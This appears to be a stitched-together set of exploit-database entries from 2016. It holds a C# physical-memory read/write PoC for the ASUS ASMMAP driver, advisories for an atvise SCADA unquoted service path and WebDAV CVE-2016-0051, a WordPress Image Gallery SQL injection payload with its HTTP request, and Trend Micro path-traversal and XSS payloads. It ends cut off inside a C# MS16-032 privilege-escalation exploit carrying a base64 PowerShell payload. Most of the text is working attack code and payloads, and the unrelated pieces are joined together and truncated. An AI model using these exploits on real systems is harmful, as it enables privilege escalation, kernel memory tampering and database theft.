public MapMemIoctl(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
this.PhysicalAddress = PhysicalAddress;
// Length[0] is used with ASMMAP64, Length[1] by ASMMAP. Set both here, ASMMAP will overwrite Length[0] anyway.
this.Length = new uint[2];
this.Length[0] = Length;
this.Length[1] = Length;
this.VirtualAddress = null;
// Fire the ioctl
Console.WriteLine("[*] Mapping 0x{0}-0x{1} into this process' address space...",PhysicalAddress.ToString("X"),(PhysicalAddress+Length).ToString("X"));
if (!DeviceIoControl(asmmap,IOCTL_MAPMEM,ref this,Marshal.SizeOf(typeof(MapMemIoctl)),ref this,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
throw new Win32Exception();
}
Console.WriteLine("[+] Mapped at 0x{0}",new IntPtr(this.VirtualAddress).ToInt64().ToString("X"));
}
}
private MapMemIoctl mm;
private SafeFileHandle asmmap = null;
private bool ShouldDisposeOfAsmMap = false;
private bool HasBeenDisposed = false;
public uint Length {
get {
if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
return mm.Length[ ( IntPtr.Size == 4 ? 1 : 0 ) ];
}
}
public UnmanagedMemoryStream PhysicalMemoryBlock {
get {
if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
unsafe {
return new UnmanagedMemoryStream(mm.VirtualAddress,this.Length,this.Length,FileAccess.ReadWrite);
}
}
}
public ASMMap_MapMem(ulong PhysicalAddress,uint Length) : this(null,PhysicalAddress,Length) {
}
public ASMMap_MapMem(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
if (asmmap == null) {
asmmap = CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,FileShare.None,
IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero);
this.ShouldDisposeOfAsmMap = true;
}
this.asmmap = asmmap;
this.mm = new MapMemIoctl(asmmap,PhysicalAddress,Length);
}
public void Dispose() {
if (this.HasBeenDisposed) return;
unsafe {
Console.WriteLine("[*] Unmapping 0x{0}-0x{1} (0x{2})...",
mm.PhysicalAddress.ToString("X"),
(mm.PhysicalAddress+Length).ToString("X"),
new IntPtr(mm.VirtualAddress).ToInt64().ToString("X")
);
}
try {
if (!DeviceIoControl(asmmap,IOCTL_UNMAPMEM,ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
throw new Win32Exception();
}
Console.WriteLine("[+] Unmapped successfully");
} finally {
// dispose of the driver handle if needed
if (this.ShouldDisposeOfAsmMap) asmmap.Dispose();
this.HasBeenDisposed = true;
}
}
~ASMMap_MapMem() {
this.Dispose();
}
}
class asmmap {
public static bool TryParseDecAndHex(string value,out ulong result) {
if ((value.Length > 2) && (value.Substring(0,2) == "0x")) return ulong.TryParse(value.Substring(2),NumberStyles.AllowHexSpecifier,CultureInfo.InvariantCulture,out result);
return ulong.TryParse(value,out result);
}
public static void Usage() {
Console.WriteLine("[*] Usage: {0} <read/write> <address> <length/file>",Path.GetFileName(System.Reflection.Assembly.GetEntryAssembly().Location));
Console.WriteLine("[*] address: starting physical address to read/write, can be decimal or hex, for hex, start with 0x");
Console.WriteLine("[*] length: size of memory to read, can be decimal or hex, for hex, start with 0x");
Console.WriteLine("[*] file: file whose contents will be written at <address>");
}
public static void Read(ulong PhysicalAddress,ulong Length) {
uint IterationSize = ( IntPtr.Size == 8 ? (uint)0x10000000 : (uint)0x1000000 );
using (SafeFileHandle asmmap = ASMMap_MapMem.CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,
FileShare.None,IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero))
using (FileStream stream = new FileStream("" + (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin",FileMode.Create)) {
for (; Length > 0; Length -= IterationSize, PhysicalAddress += IterationSize) {
using (ASMMap_MapMem mapper = new ASMMap_MapMem(asmmap,PhysicalAddress,( Length > IterationSize ? IterationSize : (uint)(Length & 0xffffffff) ))) {
Console.WriteLine("[+] Reading block of memory...");
mapper.PhysicalMemoryBlock.CopyTo(stream);
}
if ( Length <= IterationSize) break;
}
}
Console.WriteLine("[+] Read successful: "+ (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin");
}
public static void Write(ulong PhysicalAddress,string Filename) {
using (FileStream stream = new FileStream(Filename,FileMode.Open))
using (ASMMap_MapMem mapper = new ASMMap_MapMem(PhysicalAddress,(uint)stream.Length)) {
Console.WriteLine("[+] Writing block of memory...");
stream.CopyTo(mapper.PhysicalMemoryBlock);
}
}
public static void Main(string[] args) {
Console.WriteLine("[*] ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write");
Console.WriteLine("[*] PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/");
if (args.Length < 3) {
Usage();
return;
}
ulong PhysicalAddress, Length;
switch (args[0]) {
case "read":
case "-read":
case "--read":
if ((!TryParseDecAndHex(args[1],out PhysicalAddress)) || (!TryParseDecAndHex(args[2],out Length))) {
Usage();
return;
}
Read(PhysicalAddress,Length);
break;
case "write":
case "-write":
case "--write":
if (!TryParseDecAndHex(args[1],out PhysicalAddress)) {
Usage();
return;
}
Write(PhysicalAddress,args[2]);
break;
default:
Usage();
break;
}
}
}
Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
Vendor: Certec EDV GmbH
Product web page: http://www.atvise.com
Affected version: 2.5.9
Summary: atvise scada is based on newest technologies
and standards: The visualization in pure web technology
as well as a consistent vertical object orientation based
on OPC UA changes the world of process management systems.
Desc: The application suffers from an unquoted search path
issue impacting the service 'atserver' for Windows deployed
as part of atvise SCADA. This could potentially allow an
authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or
other security applications where it could potentially be
executed during application startup or reboot. If successful,
the local user’s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5321
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
17.03.2016
---
C:\Users\user>sc qc atserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: atserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\atvise\atserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : atvise server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: WebDAV Elevation of Privilege Vulnerability (MS16)-2
# Date: 8/5/2016
# Exploit Author: hex0r
# Version:WebDAV on Windows 7 84x
# CVE : CVE-2016-0051
Intro:
Credits go to koczkatama for coding a PoC, however if you run this exploit
from shell connection, not a remote desktop, the result will be getting the
privileged shell in new GUI windows.
Again Thanks to
https://github.com/koczkatamas/CVE-2016-0051
https://www.exploit-db.com/exploits/39432/
PoC:
Download the source code (C#) also there will be compiled version as well,
copy the dll file and the executable to the target machine, run it to get
SYSTEM,
Proof of Concept:
https://github.com/hexx0r/CVE-2016-0051
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39788.zip
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
# Date: 12-05-2016
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
# Version: 1.8.9 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
##### About #####
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
##### SQL Injection #####
Headers X-Forwarded-For and Client-Ip are vulnerable.
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Client-Ip: 123.123.123.123
X-Forwarded-For: 123.123.123.123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
### Extras infos #####
The "galleryid" must be configured or try another id.
You don't need to be authed to exploit the injection but the plugin must be enable.
"task" parameter can be:
load_images_content
load_images_lightbox
load_image_justified
load_image_thumbnail
load_blog_view
Client-Ip overwrite X-Forwarded-For.
Some system drop those headers.
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=775
The main component of Trend Micro Antivirus is CoreServiceShell.exe, which runs as NT AUTHORITY\SYSTEM.
The CoreServiceShell includes an HTTP daemon, which is used for redirecting network content inspection among other things. For example, if you attempt to visit a blacklisted page, the request is redirected to http://localhost:37848/ and a warning page is displayed.
There are multiple problems with this daemon, first of all, there's a trivial path traversal in the /loadhelp/ and /wtp/ endpoints. The daemon checks paths for "../..", but this doesn't work because you can just do "..\..", which is an entirely valid path separator on Windows.
There's also some trivial header injection bugs, e.g:
http://localhost:37848/continue/TiCredToken=29579&Source=&URL=%0aContent-Type:%20text/html%0aContent-Length:%2032%0a%0a<h1>hello</h1>
By combining these two issues, you can remotely access files as SYSTEM on a Trend Micro machine.
I happened to notice another problem, the file loader.html has an obvious XSS if the window is 10px wide. I know that's an odd condition, but an attacker can easily force that with something like
<iframe width="26px" scrolling="no" src="http://localhost:37848/LocalHelp/loader?javascript:alert(1)">
The code is like this:
var st = getStyle("a", "width");
if (st == "10px") {
var queryString = window.location.search;
if (queryString.length > 0 && queryString.charAt(0) == "?") {
var url = queryString.substr(1);
}
window.location.href = url;
}
I honestly have no idea what the author intended, but this bug can be used with the path traversal to access arbitrary local files, or even authenticated remote files by forcing them to be downloaded (<a href=foo download>.click())
# Exploit Title: Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
# Date: 2016-04-25
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Original exploit: https://www.exploit-db.com/exploits/39719/
# All credits go to @FuzzySec
# C# version with @FuzzySec powershell code which does not rely on powershell.exe. Instead it runs from a powershell runspace environment (.NET). Helpful in security restricted environments with GPO, SRP, App Locker.
# To compile MS16-032 you need to import this project within Microsoft Visual Studio or if you don't have access to a Visual Studio installation, you can compile with csc.exe.
# It uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
# CVE: 2016-0099
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
namespace MS16_032
{
class Program
{
static void Main()
{
PowerShellExecutor t = new PowerShellExecutor();
t.ExecuteSynchronously();
}
}
class PowerShellExecutor
{
public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsNCjwjDQouU1lOT1BTSVMNCiAgICANCiAgICBQb3dlclNoZWxsIGltcGxlbWVudGF0aW9uIG9mIE1TMTYtMDMyLiBUaGUgZXhwbG9pdCB0YXJnZXRzIGFsbCB2dWxuZXJhYmxlDQogICAgb3BlcmF0aW5nIHN5c3RlbXMgdGhhdCBzdXBwb3J0IFBvd2VyU2hlbGwgdjIrLiBDcmVkaXQgZm9yIHRoZSBkaXNjb3Zlcnkgb2YNCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4NCiAgICANCiAgICBUYXJnZXRzOg0KICAgIA0KICAgICogV2luNy1XaW4xMCAmIDJrOC0yazEyIDw9PSAzMi82NCBiaXQhDQogICAgKiBUZXN0ZWQgb24geDMyIFdpbjcsIHg2NCBXaW44LCB4NjQgMmsxMlIyDQogICAgDQogICAgTm90ZXM6DQogICAgDQogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQ0KICAgICAgY29yZXMuIElmIHRlc3RpbmcgaW4gYSBWTSBqdXN0IG1ha2Ugc3VyZSB0byBhZGQgYSBjb3JlIGlmIG5lZWRlZCBta2F5Lg0KICAgICogVGhlIGV4cGxvaXQgaXMgcHJldHR5IHJlbGlhYmxlLCBob3dldmVyIH4xLzYgdGltZXMgaXQgd2lsbCBzYXkgaXQgc3VjY2VlZGVkDQogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQ0KICAgICogV2FudCB0byBrbm93IG1vcmUgYWJvdXQgTVMxNi0wMzIgPT0+DQogICAgICBodHRwczovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvLnVrLzIwMTYvMDMvZXhwbG9pdGluZy1sZWFrZWQtdGhyZWFkLWhhbmRsZS5odG1sDQoNCi5ERVNDUklQVElPTg0KCUF1dGhvcjogUnViZW4gQm9vbmVuIChARnV6enlTZWMpDQoJQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8NCglMaWNlbnNlOiBCU0QgMy1DbGF1c2UNCglSZXF1aXJlZCBEZXBlbmRlbmNpZXM6IFBvd2VyU2hlbGwgdjIrDQoJT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lDQogICAgDQouRVhBTVBMRQ0KCUM6XFBTPiBJbnZva2UtTVMxNi0wMzINCiM+DQoJQWRkLVR5cGUgLVR5cGVEZWZpbml0aW9uIEAiDQoJdXNpbmcgU3lzdGVtOw0KCXVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCgl1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQoJdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsNCgkNCglbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldDQoJcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9ODQoJew0KCQlwdWJsaWMgSW50UHRyIGhQcm9jZXNzOw0KCQlwdWJsaWMgSW50UHRyIGhUaHJlYWQ7DQoJCXB1YmxpYyBpbnQgZHdQcm9jZXNzSWQ7DQoJCXB1YmxpYyBpbnQgZHdUaHJlYWRJZDsNCgl9DQoJDQoJW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwsIENoYXJTZXQ9Q2hhclNldC5Vbmljb2RlKV0NCglwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPDQoJew0KCQlwdWJsaWMgSW50MzIgY2I7DQoJCXB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsNCgkJcHVibGljIHN0cmluZyBscERlc2t0b3A7DQoJCXB1YmxpYyBzdHJpbmcgbHBUaXRsZTsNCgkJcHVibGljIEludDMyIGR3WDsNCgkJcHVibGljIEludDMyIGR3WTsNCgkJcHVibGljIEludDMyIGR3WFNpemU7DQoJCXB1YmxpYyBJbnQzMiBkd1lTaXplOw0KCQlwdWJsaWMgSW50MzIgZHdYQ291bnRDaGFyczsNCgkJcHVibGljIEludDMyIGR3WUNvdW50Q2hhcnM7DQoJCXB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7DQoJCXB1YmxpYyBJbnQzMiBkd0ZsYWdzOw0KCQlwdWJsaWMgSW50MTYgd1Nob3dXaW5kb3c7DQoJCXB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsNCgkJcHVibGljIEludFB0ciBscFJlc2VydmVkMjsNCgkJcHVibGljIEludFB0ciBoU3RkSW5wdXQ7DQoJCXB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsNCgkJcHVibGljIEludFB0ciBoU3RkRXJyb3I7DQoJfQ0KCQ0KCVtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsKV0NCglwdWJsaWMgc3RydWN0IFNRT1MNCgl7DQoJCXB1YmxpYyBpbnQgTGVuZ3RoOw0KCQlwdWJsaWMgaW50IEltcGVyc29uYXRpb25MZXZlbDsNCgkJcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOw0KCQlwdWJsaWMgYm9vbCBFZmZlY3RpdmVPbmx5Ow0KCX0NCgkNCglwdWJsaWMgc3RhdGljIGNsYXNzIEFkdmFwaTMyDQoJew0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKA0KCQkJU3RyaW5nIHVzZXJOYW1lLA0KCQkJU3RyaW5nIGRvbWFpbiwNCgkJCVN0cmluZyBwYXNzd29yZCwNCgkJCWludCBsb2dvbkZsYWdzLA0KCQkJU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwNCgkJCVN0cmluZyBjb21tYW5kTGluZSwNCgkJCWludCBjcmVhdGlvbkZsYWdzLA0KCQkJaW50IGVudmlyb25tZW50LA0KCQkJU3RyaW5nIGN1cnJlbnREaXJlY3RvcnksDQoJCQlyZWYgIFNUQVJUVVBJTkZPIHN0YXJ0dXBJbmZvLA0KCQkJb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsNCgkJCQ0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oDQoJCQlyZWYgSW50UHRyIFRocmVhZCwNCgkJCUludFB0ciBUb2tlbik7DQoJCQkNCgkJW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIE9wZW5UaHJlYWRUb2tlbigNCgkJCUludFB0ciBUaHJlYWRIYW5kbGUsDQoJCQlpbnQgRGVzaXJlZEFjY2VzcywNCgkJCWJvb2wgT3BlbkFzU2VsZiwNCgkJCW91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOw0KCQkJDQoJCVtEbGxJbXBvcnQoImFkdmFwaTMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKA0KCQkJSW50UHRyIFByb2Nlc3NIYW5kbGUsIA0KCQkJaW50IERlc2lyZWRBY2Nlc3MsDQoJCQlyZWYgSW50UHRyIFRva2VuSGFuZGxlKTsNCgkJCQ0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oDQoJCQlJbnRQdHIgRXhpc3RpbmdUb2tlbkhhbmRsZSwNCgkJCWludCBTRUNVUklUWV9JTVBFUlNPTkFUSU9OX0xFVkVMLA0KCQkJcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7DQoJfQ0KCQ0KCXB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzINCgl7DQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKA0KCQkJSW50UHRyIGhQcm9jZXNzLA0KCQkJdWludCB1RXhpdENvZGUpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ2xvc2VIYW5kbGUoSW50UHRyIGhPYmplY3QpOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIER1cGxpY2F0ZUhhbmRsZSgNCgkJCUludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwNCgkJCUludFB0ciBoU291cmNlSGFuZGxlLA0KCQkJSW50UHRyIGhUYXJnZXRQcm9jZXNzSGFuZGxlLA0KCQkJcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwNCgkJCWludCBkd0Rlc2lyZWRBY2Nlc3MsDQoJCQlib29sIGJJbmhlcml0SGFuZGxlLA0KCQkJaW50IGR3T3B0aW9ucyk7DQoJfQ0KCQ0KCXB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwNCgl7DQoJCVtEbGxJbXBvcnQoIm50ZGxsLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoDQoJCQlJbnRQdHIgVGhyZWFkSGFuZGxlLA0KCQkJSW50UHRyIFRocmVhZFRvSW1wZXJzb25hdGUsDQoJCQlyZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOw0KCX0NCiJADQoJDQoJZnVuY3Rpb24gR2V0LVRocmVhZEhhbmRsZSB7DQoJCSMgU3RhcnR1cEluZm8gU3RydWN0DQoJCSRTdGFydHVwSW5mbyA9IE5ldy1PYmplY3QgU1RBUlRVUElORk8NCgkJJFN0YXJ0dXBJbmZvLmR3RmxhZ3MgPSAweDAwMDAwMTAwICMgU1RBUlRGX1VTRVNUREhBTkRMRVMNCgkJJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQ0KCQkkU3RhcnR1cEluZm8uaFN0ZE91dHB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQ0KCQkkU3RhcnR1cEluZm8uaFN0ZEVycm9yID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpDQoJCSRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUNCgkJDQoJCSMgUHJvY2Vzc0luZm8gU3RydWN0DQoJCSRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTg0KCQkNCgkJIyBDcmVhdGVQcm9jZXNzV2l0aExvZ29uVyAtLT4gbHBDdXJyZW50RGlyZWN0b3J5DQoJCSRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQ0KCQkNCgkJIyBMT0dPTl9ORVRDUkVERU5USUFMU19PTkxZIC8gQ1JFQVRFX1NVU1BFTkRFRA0KCQkkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKA0KCQkJInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLA0KCQkJMHgwMDAwMDAwMiwgIkM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSIsICIiLA0KCQkJMHgwMDAwMDAwNCwgJG51bGwsICRHZXRDdXJyZW50UGF0aCwNCgkJCVtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykNCgkJDQoJCSMgRHVwbGljYXRlIGhhbmRsZSBpbnRvIGN1cnJlbnQgcHJvY2VzcyAtPiBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MNCgkJJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8NCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpEdXBsaWNhdGVIYW5kbGUoDQoJCQkkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4NCwNCgkJCVtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksDQoJCQlbcmVmXSRscFRhcmdldEhhbmRsZSwgMCwgJGZhbHNlLA0KCQkJMHgwMDAwMDAwMikNCgkJDQoJCSMgQ2xlYW4gdXAgc3VzcGVuZGVkIHByb2Nlc3MNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpUZXJtaW5hdGVQcm9jZXNzKCRQcm9jZXNzSW5mby5oUHJvY2VzcywgMSkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpDQoJCSRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6Q2xvc2VIYW5kbGUoJFByb2Nlc3NJbmZvLmhUaHJlYWQpDQoJCQ0KCQkkbHBUYXJnZXRIYW5kbGUNCgl9DQoJDQoJZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsNCgkJZWNobyAiYG5bP10gVHJ5aW5nIHRocmVhZCBoYW5kbGU6ICRUaHJlYWQiDQoJCWVjaG8gIls/XSBUaHJlYWQgYmVsb25ncyB0bzogJCgkKEdldC1Qcm9jZXNzIC1QSUQgJChbS2VybmVsMzJdOjpHZXRQcm9jZXNzSWRPZlRocmVhZCgkVGhyZWFkKSkpLlByb2Nlc3NOYW1lKSINCgkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpTdXNwZW5kVGhyZWFkKCRUaHJlYWQpDQoJCWlmICgkQ2FsbFJlc3VsdCAtbmUgMCkgew0KCQkJZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiINCgkJCVJldHVybg0KCQl9IGVjaG8gIlsrXSBUaHJlYWQgc3VzcGVuZGVkIg0KCQkNCgkJZWNobyAiWz5dIFdpcGluZyBjdXJyZW50IGltcGVyc29uYXRpb24gdG9rZW4iDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6U2V0VGhyZWFkVG9rZW4oW3JlZl0kVGhyZWFkLCBbSW50UHRyXTo6WmVybykNCgkJaWYgKCEkQ2FsbFJlc3VsdCkgew0KCQkJZWNobyAiWyFdIFNldFRocmVhZFRva2VuIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9D